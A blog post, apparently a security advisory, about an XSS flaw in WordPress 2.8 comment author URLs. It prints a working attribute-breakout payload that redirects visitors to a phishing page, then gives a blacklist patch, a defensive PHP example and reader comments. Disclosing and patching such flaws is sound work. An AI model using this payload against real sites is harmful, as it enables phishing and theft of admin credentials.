Be Careful: WordPress 2.8 (All Versions) XSS 0-day
It has been published that all WordPress 2.8 versions suffer from a cross-site scripting (XSS) flaw. Attackers can use it for phishing: they build a WordPress login page that looks exactly like your own. If you are not careful, your password is sent to the attacker's website. With your password they can edit pages and upload a webshell. It is harmful.
How does the attacker do this?
They insert a website URL like this one in the comment form's website (author URL) field:
http://www.vul.kr' onmousemove='location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);
The single quote closes the href attribute and the rest becomes an onmousemove handler. If someone (including the administrator) moves the mouse over the author's website link, the browser jumps to another URL, which is the phishing page.
How can we patch it?
Edit wp-comments-post.php, go to line 40 and add:
$comment_author_url = str_replace(chr(39),'',$comment_author_url); // remove single quote (')
$comment_author_url = str_replace(chr(59),'',$comment_author_url); // remove semicolon (;)
$comment_author_url = str_replace(chr(44),'',$comment_author_url); // remove comma (,)
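The three str_replace lines above are a character blacklist, and blacklists tend to miss variants (a double quote, for example, breaks out of a double-quoted attribute in the same way). The usual defence is to validate the URL when the comment is submitted and to escape it for the HTML attribute when it is printed. The following is an added example written for this post; it is not the author's patch and not WordPress code, and the function names sanitize_author_url and author_link_html are assumptions:

```php
<?php
// Added example (not from the original post, not WordPress code).
// Defender-side handling of a comment author URL: validate on input,
// escape on output, so a quote in the value can never end the attribute.

// Return the URL unchanged if it is a well-formed http/https URL,
// otherwise an empty string (the link is simply not rendered).
function sanitize_author_url(string $raw): string
{
    $url = trim($raw);
    // Rejects values that are not a syntactically valid absolute URL
    // (quotes and spaces in the host part fail this check).
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    // Only http and https are acceptable for an author link;
    // javascript:, data: and similar schemes are dropped here.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    return $url;
}

// Build the author link. ENT_QUOTES escapes both ' and ", so whatever
// survived validation stays inside the attribute value at render time.
function author_link_html(string $url, string $name): string
{
    $safe_url  = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $safe_name = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    if ($safe_url === '') {
        return $safe_name;
    }
    return "<a href='" . $safe_url . "' rel='external nofollow'>" . $safe_name . "</a>";
}

// Constructed inputs for demonstration: a normal URL and one shaped like
// the malformed value described in the post (quote followed by an event handler).
$benign  = "http://www.vul.kr/?p=569";
$hostile = "http://www.vul.kr' onmousemove='alert(1)";

echo author_link_html(sanitize_author_url($benign), 'visitor'), "\n";
echo author_link_html(sanitize_author_url($hostile), 'visitor'), "\n";

// Defence in depth: even if an unvalidated value reached the template,
// the output escaping alone keeps it inside the href attribute.
echo author_link_html($hostile, 'visitor'), "\n";
```

Run it with the PHP CLI (php example.php). The benign URL renders as a normal link, the hostile value is rejected at validation time and only the name is printed, and the last line shows the escaped form, where the quote appears as an entity rather than closing the attribute.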

Webmasters, please patch it as soon as you can.
Hi, I can't understand how to add your site to my RSS reader. Can you help me, please?
Hi, my RSS feed is here: http://feeds.feedburner.com/http/wwwvulkr/feedrss2
If you have a Gmail account, click it and then log in to your account; you can add it there.
I like your style; the fact that your site is a little bit different makes it so interesting. I get fed up of seeing same-old-same-old all of the time. I've just stumbled this page for you.
This has been really interesting, thanks for that. I love this blog theme too!